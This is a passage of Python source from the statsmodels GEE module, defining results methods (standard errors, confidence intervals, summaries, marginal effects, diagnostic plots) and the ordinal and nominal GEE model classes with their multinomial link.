errors for any covariance type. The value of `bse` is the
standard errors for whichever covariance type is specified as
an argument to `fit` (defaults to "robust").
Parameters
----------
cov_type : str
One of "robust", "naive", or "bias_reduced". Determines
the covariance used to compute standard errors. Defaults
to "robust".
"""
# Check covariance_type
covariance_type = cov_type.lower()
allowed_covariances = ["robust", "naive", "bias_reduced"]
if covariance_type not in allowed_covariances:
msg = ("GEE: `covariance_type` must be one of " +
", ".join(allowed_covariances))
raise ValueError(msg)
if covariance_type == "robust":
return np.sqrt(np.diag(self.cov_robust))
elif covariance_type == "naive":
return np.sqrt(np.diag(self.cov_naive))
elif covariance_type == "bias_reduced":
if self.cov_robust_bc is None:
raise ValueError(
"GEE: `bias_reduced` covariance not available")
return np.sqrt(np.diag(self.cov_robust_bc))
# Need to override to allow for different covariance types.
@cache_readonly
def bse(self):
return self.standard_errors(self.cov_type)
def score_test(self):
"""
Return the results of a score test for a linear constraint.
Returns
-------
Adictionary containing the p-value, the test statistic,
and the degrees of freedom for the score test.
Notes
-----
See also GEE.compare_score_test for an alternative way to perform
a score test. GEEResults.score_test is more general, in that it
supports testing arbitrary linear equality constraints. However
GEE.compare_score_test might be easier to use when comparing
two explicit models.
References
----------
Xu Guo and Wei Pan (2002). "Small sample performance of the score
test in GEE".
http://www.sph.umn.edu/faculty1/wp-content/uploads/2012/11/rr2002-013.pdf
"""
if not hasattr(self.model, "score_test_results"):
msg = "score_test on results instance only available when "
msg += " model was fit with constraints"
raise ValueError(msg)
return self.model.score_test_results
@cache_readonly
def resid_split(self):
"""
Returns the residuals, the endogeneous data minus the fitted
values from the model. The residuals are returned as a list
of arrays containing the residuals for each cluster.
"""
sresid = []
for v in self.model.group_labels:
ii = self.model.group_indices[v]
sresid.append(self.resid[ii])
return sresid
@cache_readonly
def resid_centered(self):
"""
Returns the residuals centered within each group.
"""
cresid = self.resid.copy()
for v in self.model.group_labels:
ii = self.model.group_indices[v]
cresid[ii] -= cresid[ii].mean()
return cresid
@cache_readonly
def resid_centered_split(self):
"""
Returns the residuals centered within each group. The
residuals are returned as a list of arrays containing the
centered residuals for each cluster.
"""
sresid = []
for v in self.model.group_labels:
ii = self.model.group_indices[v]
sresid.append(self.centered_resid[ii])
return sresid
def qic(self, scale=None):
"""
Returns the QIC and QICu information criteria.
For families with a scale parameter (e.g. Gaussian), provide
as the scale argument the estimated scale from the largest
model under consideration.
If the scale parameter is not provided, the estimated scale
parameter is used. Doing this does not allow comparisons of
QIC values between models.
"""
# It is easy to forget to set the scale parameter. Sometimes
# this is intentional, so we warn.
if scale is None:
warnings.warn("QIC values obtained using scale=None are not "
"appropriate for comparing models")
if scale is None:
scale = self.scale
_, qic, qicu = self.model.qic(self.params, scale,
self.cov_params())
return qic, qicu
# FIXME: alias to be removed, temporary backwards compatibility
split_resid = resid_split
centered_resid = resid_centered
split_centered_resid = resid_centered_split
@Appender(_plot_added_variable_doc % {'extra_params_doc': ''})
def plot_added_variable(self, focus_exog, resid_type=None,
use_glm_weights=True, fit_kwargs=None,
ax=None):
from statsmodels.graphics.regressionplots import plot_added_variable
fig = plot_added_variable(self, focus_exog,
resid_type=resid_type,
use_glm_weights=use_glm_weights,
fit_kwargs=fit_kwargs, ax=ax)
return fig
@Appender(_plot_partial_residuals_doc % {'extra_params_doc': ''})
def plot_partial_residuals(self, focus_exog, ax=None):
from statsmodels.graphics.regressionplots import plot_partial_residuals
return plot_partial_residuals(self, focus_exog, ax=ax)
@Appender(_plot_ceres_residuals_doc % {'extra_params_doc': ''})
def plot_ceres_residuals(self, focus_exog, frac=0.66, cond_means=None,
ax=None):
from statsmodels.graphics.regressionplots import plot_ceres_residuals
return plot_ceres_residuals(self, focus_exog, frac,
cond_means=cond_means, ax=ax)
def conf_int(self, alpha=.05, cols=None, cov_type=None):
"""
Returns confidence intervals for the fitted parameters.
Parameters
----------
alpha : float, optional
The `alpha` level for the confidence interval. i.e., The
default `alpha` = .05 returns a 95% confidence interval.
cols : array_like, optional
`cols` specifies which confidence intervals to return
cov_type : str
The covariance type used for computing standard errors;
must be one of 'robust', 'naive', and 'bias reduced'.
See `GEE` for details.
Notes
-----
The confidence interval is based on the Gaussian distribution.
"""
# super does not allow to specify cov_type and method is not
# implemented,
# FIXME: remove this method here
if cov_type is None:
bse = self.bse
else:
bse = self.standard_errors(cov_type=cov_type)
params = self.params
dist = stats.norm
q = dist.ppf(1 - alpha / 2)
if cols is None:
lower = self.params - q * bse
upper = self.params + q * bse
else:
cols = np.asarray(cols)
lower = params[cols] - q * bse[cols]
upper = params[cols] + q * bse[cols]
return np.asarray(lzip(lower, upper))
def summary(self, yname=None, xname=None, title=None, alpha=.05):
"""
Summarize the GEE regression results
Parameters
----------
yname : str, optional
Default is `y`
xname : list[str], optional
Names for the exogenous variables, default is `var_#` for ## in
the number of regressors. Must match the number of parameters in
the model
title : str, optional
Title for the top table. If not None, then this replaces
the default title
alpha : float
significance level for the confidence intervals
cov_type : str
The covariance type used to compute the standard errors;
one of 'robust' (the usual robust sandwich-type covariance
estimate), 'naive' (ignores dependence), and 'bias
reduced' (the Mancl/DeRouen estimate).
Returns
-------
smry : Summary instance
this holds the summary tables and text, which can be
printed or converted to various output formats.
See Also
--------
statsmodels.iolib.summary.Summary : class to hold summary results
"""
top_left = [('Dep. Variable:', None),
('Model:', None),
('Method:', ['Generalized']),
('', ['Estimating Equations']),
('Family:', [self.model.family.__class__.__name__]),
('Dependence structure:',
[self.model.cov_struct.__class__.__name__]),
('Date:', None),
('Covariance type: ', [self.cov_type, ])
]
NY = [len(y) for y in self.model.endog_li]
top_right = [('No. Observations:', [sum(NY)]),
('No. clusters:', [len(self.model.endog_li)]),
('Min. cluster size:', [min(NY)]),
('Max. cluster size:', [max(NY)]),
('Mean cluster size:', ["%.1f" % np.mean(NY)]),
('Num. iterations:', ['%d' %
len(self.fit_history['params'])]),
('Scale:', ["%.3f" % self.scale]),
('Time:', None),
]
# The skew of the residuals
skew1 = stats.skew(self.resid)
kurt1 = stats.kurtosis(self.resid)
skew2 = stats.skew(self.centered_resid)
kurt2 = stats.kurtosis(self.centered_resid)
diagn_left = [('Skew:', ["%12.4f" % skew1]),
('Centered skew:', ["%12.4f" % skew2])]
diagn_right = [('Kurtosis:', ["%12.4f" % kurt1]),
('Centered kurtosis:', ["%12.4f" % kurt2])
]
if title is None:
title = self.model.__class__.__name__ + ' ' +\
"Regression Results"
# Override the exog variable names if xname is provided as an
# argument.
if xname is None:
xname = self.model.exog_names
if yname is None:
yname = self.model.endog_names
# Create summary table instance
from statsmodels.iolib.summary import Summary
smry = Summary()
smry.add_table_2cols(self, gleft=top_left, gright=top_right,
yname=yname, xname=xname,
title=title)
smry.add_table_params(self, yname=yname, xname=xname,
alpha=alpha, use_t=False)
smry.add_table_2cols(self, gleft=diagn_left,
gright=diagn_right, yname=yname,
xname=xname, title="")
return smry
def get_margeff(self, at='overall', method='dydx', atexog=None,
dummy=False, count=False):
"""Get marginal effects of the fitted model.
Parameters
----------
at : str, optional
Options are:
- 'overall', The average of the marginal effects at each
observation.
- 'mean', The marginal effects at the mean of each regressor.
- 'median', The marginal effects at the median of each regressor.
- 'zero', The marginal effects at zero for each regressor.
- 'all', The marginal effects at each observation. If `at` is 'all'
only margeff will be available.
Note that if `exog` is specified, then marginal effects for all
variables not specified by `exog` are calculated using the `at`
option.
method : str, optional
Options are:
- 'dydx' - dy/dx - No transformation is made and marginal effects
are returned. This is the default.
- 'eyex' - estimate elasticities of variables in `exog` --
d(lny)/d(lnx)
- 'dyex' - estimate semi-elasticity -- dy/d(lnx)
- 'eydx' - estimate semi-elasticity -- d(lny)/dx
Note that tranformations are done after each observation is
calculated. Semi-elasticities for binary variables are computed
using the midpoint method. 'dyex' and 'eyex' do not make sense
for discrete variables.
atexog : array_like, optional
Optionally, you can provide the exogenous variables over which to
get the marginal effects. This should be a dictionary with the key
as the zero-indexed column number and the value of the dictionary.
Default is None for all independent variables less the constant.
dummy : bool, optional
If False, treats binary variables (if present) as continuous. This
is the default. Else if True, treats binary variables as
changing from 0 to 1. Note that any variable that is either 0 or 1
is treated as binary. Each binary variable is treated separately
for now.
count : bool, optional
If False, treats count variables (if present) as continuous. This
is the default. Else if True, the marginal effect is the
change in probabilities when each observation is increased by one.
Returns
-------
effects : ndarray
the marginal effect corresponding to the input options
Notes
-----
When using after Poisson, returns the expected number of events
per period, assuming that the model is loglinear.
"""
if self.model.constraint is not None:
warnings.warn("marginal effects ignore constraints",
ValueWarning)
return GEEMargins(self, (at, method, atexog, dummy, count))
def plot_isotropic_dependence(self, ax=None, xpoints=10,
min_n=50):
"""
Create a plot of the pairwise products of within-group
residuals against the corresponding time differences. This
plot can be used to assess the possible form of an isotropic
covariance structure.
Parameters
----------
ax : AxesSubplot
An axes on which to draw the graph. If None, new
figure and axes objects are created
xpoints : scalar or array_like
If scalar, the number of points equally spaced points on
the time difference axis used to define bins for
calculating local means. If an array, the specific points
that define the bins.
min_n : int
The minimum sample size in a bin for the mean residual
product to be included on the plot.
"""
from statsmodels.graphics import utils as gutils
resid = self.model.cluster_list(self.resid)
time = self.model.cluster_list(self.model.time)
# All within-group pairwise time distances (xdt) and the
# corresponding products of scaled residuals (xre).
xre, xdt = [], []
for re, ti in zip(resid, time):
ix = np.tril_indices(re.shape[0], 0)
re = re[ix[0]] * re[ix[1]] / self.scale ** 2
xre.append(re)
dists = np.sqrt(((ti[ix[0], :] - ti[ix[1], :]) ** 2).sum(1))
xdt.append(dists)
xre = np.concatenate(xre)
xdt = np.concatenate(xdt)
if ax is None:
fig, ax = gutils.create_mpl_ax(ax)
else:
fig = ax.get_figure()
# Convert to a correlation
ii = np.flatnonzero(xdt == 0)
v0 = np.mean(xre[ii])
xre /= v0
# Use the simple average to smooth, since fancier smoothers
# that trim and downweight outliers give biased results (we
# need the actual mean of a skewed distribution).
if np.isscalar(xpoints):
xpoints = np.linspace(0, max(xdt), xpoints)
dg = np.digitize(xdt, xpoints)
dgu = np.unique(dg)
hist = np.asarray([np.sum(dg == k) for k in dgu])
ii = np.flatnonzero(hist >= min_n)
dgu = dgu[ii]
dgy = np.asarray([np.mean(xre[dg == k]) for k in dgu])
dgx = np.asarray([np.mean(xdt[dg == k]) for k in dgu])
ax.plot(dgx, dgy, '-', color='orange', lw=5)
ax.set_xlabel("Time difference")
ax.set_ylabel("Product of scaled residuals")
return fig
def sensitivity_params(self, dep_params_first,
dep_params_last, num_steps):
"""
Refits the GEE model using a sequence of values for the
dependence parameters.
Parameters
----------
dep_params_first : array_like
The first dep_params in the sequence
dep_params_last : array_like
The last dep_params in the sequence
num_steps : int
The number of dep_params in the sequence
Returns
-------
results : array_like
The GEEResults objects resulting from the fits.
"""
model = self.model
import copy
cov_struct = copy.deepcopy(self.model.cov_struct)
# We are fixing the dependence structure in each run.
update_dep = model.update_dep
model.update_dep = False
dep_params = []
results = []
for x in np.linspace(0, 1, num_steps):
dp = x * dep_params_last + (1 - x) * dep_params_first
dep_params.append(dp)
model.cov_struct = copy.deepcopy(cov_struct)
model.cov_struct.dep_params = dp
rslt = model.fit(start_params=self.params,
ctol=self.ctol,
params_niter=self.params_niter,
first_dep_update=self.first_dep_update,
cov_type=self.cov_type)
results.append(rslt)
model.update_dep = update_dep
return results
# FIXME: alias to be removed, temporary backwards compatibility
params_sensitivity = sensitivity_params
class GEEResultsWrapper(lm.RegressionResultsWrapper):
_attrs = {
'centered_resid': 'rows',
}
_wrap_attrs = wrap.union_dicts(lm.RegressionResultsWrapper._wrap_attrs,
_attrs)
wrap.populate_wrapper(GEEResultsWrapper, GEEResults) # noqa:E305
class OrdinalGEE(GEE):
__doc__ = (
" Ordinal Response Marginal Regression Model using GEE\n" +
_gee_init_doc % {'extra_params': base._missing_param_doc,
'family_doc': _gee_ordinal_family_doc,
'example': _gee_ordinal_example,
'notes': _gee_nointercept})
def __init__(self, endog, exog, groups, time=None, family=None,
cov_struct=None, missing='none', offset=None,
dep_data=None, constraint=None, **kwargs):
if family is None:
family = families.Binomial()
else:
if not isinstance(family, families.Binomial):
raise ValueError("ordinal GEE must use a Binomial family")
if cov_struct is None:
cov_struct = cov_structs.OrdinalIndependence()
endog, exog, groups, time, offset = self.setup_ordinal(
endog, exog, groups, time, offset)
super(OrdinalGEE, self).__init__(endog, exog, groups, time,
family, cov_struct, missing,
offset, dep_data, constraint)
def setup_ordinal(self, endog, exog, groups, time, offset):
"""
Restructure ordinal data as binary indicators so that they can
be analyzed using Generalized Estimating Equations.
"""
self.endog_orig = endog.copy()
self.exog_orig = exog.copy()
self.groups_orig = groups.copy()
if offset is not None:
self.offset_orig = offset.copy()
else:
self.offset_orig = None
offset = np.zeros(len(endog))
if time is not None:
self.time_orig = time.copy()
else:
self.time_orig = None
time = np.zeros((len(endog), 1))
exog = np.asarray(exog)
endog = np.asarray(endog)
groups = np.asarray(groups)
time = np.asarray(time)
offset = np.asarray(offset)
# The unique outcomes, except the greatest one.
self.endog_values = np.unique(endog)
endog_cuts = self.endog_values[0:-1]
ncut = len(endog_cuts)
nrows = ncut * len(endog)
exog_out = np.zeros((nrows, exog.shape[1]),
dtype=np.float64)
endog_out = np.zeros(nrows, dtype=np.float64)
intercepts = np.zeros((nrows, ncut), dtype=np.float64)
groups_out = np.zeros(nrows, dtype=groups.dtype)
time_out = np.zeros((nrows, time.shape[1]),
dtype=np.float64)
offset_out = np.zeros(nrows, dtype=np.float64)
jrow = 0
zipper = zip(exog, endog, groups, time, offset)
for (exog_row, endog_value, group_value, time_value,
offset_value) in zipper:
# Loop over thresholds for the indicators
for thresh_ix, thresh in enumerate(endog_cuts):
exog_out[jrow, :] = exog_row
endog_out[jrow] = (int(endog_value > thresh))
intercepts[jrow, thresh_ix] = 1
groups_out[jrow] = group_value
time_out[jrow] = time_value
offset_out[jrow] = offset_value
jrow += 1
exog_out = np.concatenate((intercepts, exog_out), axis=1)
# exog column names, including intercepts
xnames = ["I(y>%.1f)" % v for v in endog_cuts]
if type(self.exog_orig) == pd.DataFrame:
xnames.extend(self.exog_orig.columns)
else:
xnames.extend(["x%d" % k for k in range(1, exog.shape[1] + 1)])
exog_out = pd.DataFrame(exog_out, columns=xnames)
# Preserve the endog name if there is one
if type(self.endog_orig) == pd.Series:
endog_out = pd.Series(endog_out, name=self.endog_orig.name)
return endog_out, exog_out, groups_out, time_out, offset_out
def _starting_params(self):
exposure = getattr(self, "exposure", None)
model = GEE(self.endog, self.exog, self.groups,
time=self.time, family=families.Binomial(),
offset=self.offset, exposure=exposure)
result = model.fit()
return result.params
@Appender(_gee_fit_doc)
def fit(self, maxiter=60, ctol=1e-6, start_params=None,
params_niter=1, first_dep_update=0,
cov_type='robust'):
rslt = super(OrdinalGEE, self).fit(maxiter, ctol, start_params,
params_niter, first_dep_update,
cov_type=cov_type)
rslt = rslt._results # use unwrapped instance
res_kwds = dict(((k, getattr(rslt, k)) for k in rslt._props))
# Convert the GEEResults to an OrdinalGEEResults
ord_rslt = OrdinalGEEResults(self, rslt.params,
rslt.cov_params() / rslt.scale,
rslt.scale,
cov_type=cov_type,
attr_kwds=res_kwds)
# for k in rslt._props:
# setattr(ord_rslt, k, getattr(rslt, k))
# TODO: document or delete
return OrdinalGEEResultsWrapper(ord_rslt)
class OrdinalGEEResults(GEEResults):
__doc__ = (
"This class summarizes the fit of a marginal regression model"
"for an ordinal response using GEE.\n"
+ _gee_results_doc)
def plot_distribution(self, ax=None, exog_values=None):
"""
Plot the fitted probabilities of endog in an ordinal model,
for specified values of the predictors.
Parameters
----------
ax : AxesSubplot
An axes on which to draw the graph. If None, new
figure and axes objects are created
exog_values : array_like
A list of dictionaries, with each dictionary mapping
variable names to values at which the variable is held
fixed. The values P(endog=y | exog) are plotted for all
possible values of y, at the given exog value. Variables
not included in a dictionary are held fixed at the mean
value.
Example:
--------
We have a model with covariates 'age' and 'sex', and wish to
plot the probabilities P(endog=y | exog) for males (sex=0) and
for females (sex=1), as separate paths on the plot. Since
'age' is not included below in the map, it is held fixed at
its mean value.
>>> ev = [{"sex": 1}, {"sex": 0}]
>>> rslt.distribution_plot(exog_values=ev)
"""
from statsmodels.graphics import utils as gutils
if ax is None:
fig, ax = gutils.create_mpl_ax(ax)
else:
fig = ax.get_figure()
# If no covariate patterns are specified, create one with all
# variables set to their mean values.
if exog_values is None:
exog_values = [{}, ]
exog_means = self.model.exog.mean(0)
ix_icept = [i for i, x in enumerate(self.model.exog_names) if
x.startswith("I(")]
for ev in exog_values:
for k in ev.keys():
if k not in self.model.exog_names:
raise ValueError("%s is not a variable in the model"
% k)
# Get the fitted probability for each level, at the given
# covariate values.
pr = []
for j in ix_icept:
xp = np.zeros_like(self.params)
xp[j] = 1.
for i, vn in enumerate(self.model.exog_names):
if i in ix_icept:
continue
# User-specified value
if vn in ev:
xp[i] = ev[vn]
# Mean value
else:
xp[i] = exog_means[i]
p = 1 / (1 + np.exp(-np.dot(xp, self.params)))
pr.append(p)
pr.insert(0, 1)
pr.append(0)
pr = np.asarray(pr)
prd = -np.diff(pr)
ax.plot(self.model.endog_values, prd, 'o-')
ax.set_xlabel("Response value")
ax.set_ylabel("Probability")
ax.set_ylim(0, 1)
return fig
def _score_test_submodel(par, sub):
"""
Return transformation matrices for design matrices.
Parameters
----------
par : instance
The parent model
sub : instance
The sub-model
Returns
-------
qm : array_like
Matrix mapping the design matrix of the parent to the design matrix
for the sub-model.
qc : array_like
Matrix mapping the design matrix of the parent to the orthogonal
complement of the columnspace of the submodel in the columnspace
of the parent.
Notes
-----
Returns None, None if the provided submodel is not actually a submodel.
"""
x1 = par.exog
x2 = sub.exog
u, s, vt = np.linalg.svd(x1, 0)
v = vt.T
# Get the orthogonal complement of col(x2) in col(x1).
a, _ = np.linalg.qr(x2)
a = u - np.dot(a, np.dot(a.T, u))
x2c, sb, _ = np.linalg.svd(a, 0)
x2c = x2c[:, sb > 1e-12]
# x1 * qm = x2
ii = np.flatnonzero(np.abs(s) > 1e-12)
qm = np.dot(v[:, ii], np.dot(u[:, ii].T, x2) / s[ii, None])
e = np.max(np.abs(x2 - np.dot(x1, qm)))
if e > 1e-8:
return None, None
# x1 * qc = x2c
qc = np.dot(v[:, ii], np.dot(u[:, ii].T, x2c) / s[ii, None])
return qm, qc
class OrdinalGEEResultsWrapper(GEEResultsWrapper):
pass
wrap.populate_wrapper(OrdinalGEEResultsWrapper, OrdinalGEEResults) # noqa:E305
class NominalGEE(GEE):
__doc__ = (
" Nominal Response Marginal Regression Model using GEE.\n" +
_gee_init_doc % {'extra_params': base._missing_param_doc,
'family_doc': _gee_nominal_family_doc,
'example': _gee_nominal_example,
'notes': _gee_nointercept})
def __init__(self, endog, exog, groups, time=None, family=None,
cov_struct=None, missing='none', offset=None,
dep_data=None, constraint=None, **kwargs):
endog, exog, groups, time, offset = self.setup_nominal(
endog, exog, groups, time, offset)
if family is None:
family = _Multinomial(self.ncut + 1)
if cov_struct is None:
cov_struct = cov_structs.NominalIndependence()
super(NominalGEE, self).__init__(
endog, exog, groups, time, family, cov_struct, missing,
offset, dep_data, constraint)
def _starting_params(self):
exposure = getattr(self, "exposure", None)
model = GEE(self.endog, self.exog, self.groups,
time=self.time, family=families.Binomial(),
offset=self.offset, exposure=exposure)
result = model.fit()
return result.params
def setup_nominal(self, endog, exog, groups, time, offset):
"""
Restructure nominal data as binary indicators so that they can
be analyzed using Generalized Estimating Equations.
"""
self.endog_orig = endog.copy()
self.exog_orig = exog.copy()
self.groups_orig = groups.copy()
if offset is not None:
self.offset_orig = offset.copy()
else:
self.offset_orig = None
offset = np.zeros(len(endog))
if time is not None:
self.time_orig = time.copy()
else:
self.time_orig = None
time = np.zeros((len(endog), 1))
exog = np.asarray(exog)
endog = np.asarray(endog)
groups = np.asarray(groups)
time = np.asarray(time)
offset = np.asarray(offset)
# The unique outcomes, except the greatest one.
self.endog_values = np.unique(endog)
endog_cuts = self.endog_values[0:-1]
ncut = len(endog_cuts)
self.ncut = ncut
nrows = len(endog_cuts) * exog.shape[0]
ncols = len(endog_cuts) * exog.shape[1]
exog_out = np.zeros((nrows, ncols), dtype=np.float64)
endog_out = np.zeros(nrows, dtype=np.float64)
groups_out = np.zeros(nrows, dtype=np.float64)
time_out = np.zeros((nrows, time.shape[1]),
dtype=np.float64)
offset_out = np.zeros(nrows, dtype=np.float64)
jrow = 0
zipper = zip(exog, endog, groups, time, offset)
for (exog_row, endog_value, group_value, time_value,
offset_value) in zipper:
# Loop over thresholds for the indicators
for thresh_ix, thresh in enumerate(endog_cuts):
u = np.zeros(len(endog_cuts), dtype=np.float64)
u[thresh_ix] = 1
exog_out[jrow, :] = np.kron(u, exog_row)
endog_out[jrow] = (int(endog_value == thresh))
groups_out[jrow] = group_value
time_out[jrow] = time_value
offset_out[jrow] = offset_value
jrow += 1
# exog names
if isinstance(self.exog_orig, pd.DataFrame):
xnames_in = self.exog_orig.columns
else:
xnames_in = ["x%d" % k for k in range(1, exog.shape[1] + 1)]
xnames = []
for tr in endog_cuts:
xnames.extend(["%s[%.1f]" % (v, tr) for v in xnames_in])
exog_out = pd.DataFrame(exog_out, columns=xnames)
exog_out = pd.DataFrame(exog_out, columns=xnames)
# Preserve endog name if there is one
if isinstance(self.endog_orig, pd.Series):
endog_out = pd.Series(endog_out, name=self.endog_orig.name)
return endog_out, exog_out, groups_out, time_out, offset_out
def mean_deriv(self, exog, lin_pred):
"""
Derivative of the expected endog with respect to the parameters.
Parameters
----------
exog : array_like
The exogeneous data at which the derivative is computed,
number of rows must be a multiple of `ncut`.
lin_pred : array_like
The values of the linear predictor, length must be multiple
of `ncut`.
Returns
-------
The derivative of the expected endog with respect to the
parameters.
"""
expval = np.exp(lin_pred)
# Reshape so that each row contains all the indicators
# corresponding to one multinomial observation.
expval_m = np.reshape(expval, (len(expval) // self.ncut,
self.ncut))
# The normalizing constant for the multinomial probabilities.
denom = 1 + expval_m.sum(1)
denom = np.kron(denom, np.ones(self.ncut, dtype=np.float64))
# The multinomial probabilities
mprob = expval / denom
# First term of the derivative: denom * expval' / denom^2 =
# expval' / denom.
dmat = mprob[:, None] * exog
# Second term of the derivative: -expval * denom' / denom^2
ddenom = expval[:, None] * exog
dmat -= mprob[:, None] * ddenom / denom[:, None]
return dmat
def mean_deriv_exog(self, exog, params, offset_exposure=None):
"""
Derivative of the expected endog with respect to exog for the
multinomial model, used in analyzing marginal effects.
Parameters
----------
exog : array_like
The exogeneous data at which the derivative is computed,
number of rows must be a multiple of `ncut`.
lpr : array_like
The linear predictor values, length must be multiple of
`ncut`.
Returns
-------
The value of the derivative of the expected endog with respect
to exog.
Notes
-----
offset_exposure must be set at None for the multinomial family.
"""
if offset_exposure is not None:
warnings.warn("Offset/exposure ignored for the multinomial family",
ValueWarning)
lpr = np.dot(exog, params)
expval = np.exp(lpr)
expval_m = np.reshape(expval, (len(expval) // self.ncut,
self.ncut))
denom = 1 + expval_m.sum(1)
denom = np.kron(denom, np.ones(self.ncut, dtype=np.float64))
bmat0 = np.outer(np.ones(exog.shape[0]), params)
# Masking matrix
qmat = []
for j in range(self.ncut):
ee = np.zeros(self.ncut, dtype=np.float64)
ee[j] = 1
qmat.append(np.kron(ee, np.ones(len(params) // self.ncut)))
qmat = np.array(qmat)
qmat = np.kron(np.ones((exog.shape[0] // self.ncut, 1)), qmat)
bmat = bmat0 * qmat
dmat = expval[:, None] * bmat / denom[:, None]
expval_mb = np.kron(expval_m, np.ones((self.ncut, 1)))
expval_mb = np.kron(expval_mb, np.ones((1, self.ncut)))
dmat -= expval[:, None] * (bmat * expval_mb) / denom[:, None] ** 2
return dmat
@Appender(_gee_fit_doc)
def fit(self, maxiter=60, ctol=1e-6, start_params=None,
params_niter=1, first_dep_update=0,
cov_type='robust'):
rslt = super(NominalGEE, self).fit(maxiter, ctol, start_params,
params_niter, first_dep_update,
cov_type=cov_type)
if rslt is None:
warnings.warn("GEE updates did not converge",
ConvergenceWarning)
return None
rslt = rslt._results # use unwrapped instance
res_kwds = dict(((k, getattr(rslt, k)) for k in rslt._props))
# Convert the GEEResults to a NominalGEEResults
nom_rslt = NominalGEEResults(self, rslt.params,
rslt.cov_params() / rslt.scale,
rslt.scale,
cov_type=cov_type,
attr_kwds=res_kwds)
# TODO: document or delete
# for k in rslt._props:
# setattr(nom_rslt, k, getattr(rslt, k))
return NominalGEEResultsWrapper(nom_rslt)
class NominalGEEResults(GEEResults):
__doc__ = (
"This class summarizes the fit of a marginal regression model"
"for a nominal response using GEE.\n"
+ _gee_results_doc)
def plot_distribution(self, ax=None, exog_values=None):
"""
Plot the fitted probabilities of endog in an nominal model,
for specified values of the predictors.
Parameters
----------
ax : AxesSubplot
An axes on which to draw the graph. If None, new
figure and axes objects are created
exog_values : array_like
A list of dictionaries, with each dictionary mapping
variable names to values at which the variable is held
fixed. The values P(endog=y | exog) are plotted for all
possible values of y, at the given exog value. Variables
not included in a dictionary are held fixed at the mean
value.
Example:
--------
We have a model with covariates 'age' and 'sex', and wish to
plot the probabilities P(endog=y | exog) for males (sex=0) and
for females (sex=1), as separate paths on the plot. Since
'age' is not included below in the map, it is held fixed at
its mean value.
>>> ex = [{"sex": 1}, {"sex": 0}]
>>> rslt.distribution_plot(exog_values=ex)
"""
from statsmodels.graphics import utils as gutils
if ax is None:
fig, ax = gutils.create_mpl_ax(ax)
else:
fig = ax.get_figure()
# If no covariate patterns are specified, create one with all
# variables set to their mean values.
if exog_values is None:
exog_values = [{}, ]
link = self.model.family.link.inverse
ncut = self.model.family.ncut
k = int(self.model.exog.shape[1] / ncut)
exog_means = self.model.exog.mean(0)[0:k]
exog_names = self.model.exog_names[0:k]
exog_names = [x.split("[")[0] for x in exog_names]
params = np.reshape(self.params,
(ncut, len(self.params) // ncut))
for ev in exog_values:
exog = exog_means.copy()
for k in ev.keys():
if k not in exog_names:
raise ValueError("%s is not a variable in the model"
% k)
ii = exog_names.index(k)
exog[ii] = ev[k]
lpr = np.dot(params, exog)
pr = link(lpr)
pr = np.r_[pr, 1 - pr.sum()]
ax.plot(self.model.endog_values, pr, 'o-')
ax.set_xlabel("Response value")
ax.set_ylabel("Probability")
ax.set_xticks(self.model.endog_values)
ax.set_xticklabels(self.model.endog_values)
ax.set_ylim(0, 1)
return fig
class NominalGEEResultsWrapper(GEEResultsWrapper):
pass
wrap.populate_wrapper(NominalGEEResultsWrapper, NominalGEEResults) # noqa:E305
class _MultinomialLogit(Link):
"""
The multinomial logit transform, only for use with GEE.
Notes
-----
The data are assumed coded as binary indicators, where each
observed multinomial value y is coded as I(y == S[0]), ..., I(y ==
S[-1]), where S is the set of possible response labels, excluding
the largest one. Thererefore functions in this class should only
be called using vector argument whose length is a multiple of |S|
= ncut, which is an argument to be provided when initializing the
class.
call and derivative use a private method _clean to trim p by 1e-10
so that p is in (0, 1)
"""
def __init__(self, ncut):
self.ncut = ncut
def inverse(self, lpr):
"""
Inverse of the multinomial logit transform, which gives the
expected values of the data as a function of the linear
predictors.
Parameters
----------
lpr : array_like (length must be divisible by `ncut`)
The linear predictors
Returns
-------
prob : ndarray
Probabilities, or expected values
"""
expval = np.exp(lpr)
denom = 1 + np.reshape(expval, (len(expval) // self.ncut,
self.ncut)).sum(1)
denom = np.kron(denom, np.ones(self.ncut, dtype=np.float64))
prob = expval / denom
return prob
class _Multinomial(families.Family):
"""
Pseudo-link function for fitting nominal multinomial models with
GEE. Not for use outside the GEE class.
"""
links = [_MultinomialLogit, ]
variance = varfuncs.binary
safe_links = [_MultinomialLogit, ]
def __init__(self, nlevels):
"""
Parameters
----------
nlevels : int
The number of distinct categories for the multinomial
distribution.
"""
self.initialize(nlevels)
def initialize(self, nlevels):
self.ncut = nlevels - 1
self.link = _MultinomialLogit(self.ncut)
class GEEMargins(object):
"""
Estimated marginal effects for a regression model fit with GEE.
Parameters
----------
results : GEEResults instance
The results instance of a fitted discrete choice model
args : tuple
Args are passed to `get_margeff`. This is the same as
results.get_margeff. See there for more information.
kwargs : dict
Keyword args are passed to `get_margeff`. This is the same as
results.get_margeff. See there for more information.
"""
def __init__(self, results, args, kwargs={}):
self._cache = {}
self.results = results
self.get_margeff(*args, **kwargs)
def _reset(self):
self._cache = {}
@cache_readonly
def tvalues(self):
_check_at_is_all(self.margeff_options)
return self.margeff / self.margeff_se
def summary_frame(self, alpha=.05):
"""
Returns a DataFrame summarizing the marginal effects.
Parameters
----------
alpha : float
Number between 0 and 1. The confidence intervals have the
probability 1-alpha.
Returns
-------
frame : DataFrames
A DataFrame summarizing the marginal effects.
"""
_check_at_is_all(self.margeff_options)
from pandas import DataFrame
names = [_transform_names[self.margeff_options['method']],
'Std. Err.', 'z', 'Pr(>|z|)',
'Conf. Int. Low', 'Cont. Int. Hi.']
ind = self.results.model.exog.var(0) != 0 # True if not a constant
exog_names = self.results.model.exog_names
var_names = [name for i, name in enumerate(exog_names) if ind[i]]
table = np.column_stack((self.margeff, self.margeff_se, self.tvalues,
self.pvalues, self.conf_int(alpha)))
return DataFrame(table, columns=names, index=var_names)
@cache_readonly
def pvalues(self):
_check_at_is_all(self.margeff_options)
return stats.norm.sf(np.abs(self.tvalues)) * 2
def conf_int(self, alpha=.05):
"""
Returns the confidence intervals of the marginal effects
Parameters
----------
alpha : float
Number between 0 and 1. The confidence intervals have the
probability 1-alpha.
Returns
-------
conf_int : ndarray
An array with lower, upper confidence intervals for the marginal
effects.
"""
_check_at_is_all(self.margeff_options)
me_se = self.margeff_se
q = stats.norm.ppf(1 - alpha / 2)
lower = self.margeff - q * me_se
upper = self.margeff + q * me_se
return np.asarray(lzip(lower, upper))
def summary(self, alpha=.05):
"""
Returns a summary table for marginal effects
Parameters
----------
alpha : float
Number between 0 and 1. The confidence intervals have the
probability 1-alpha.
Returns
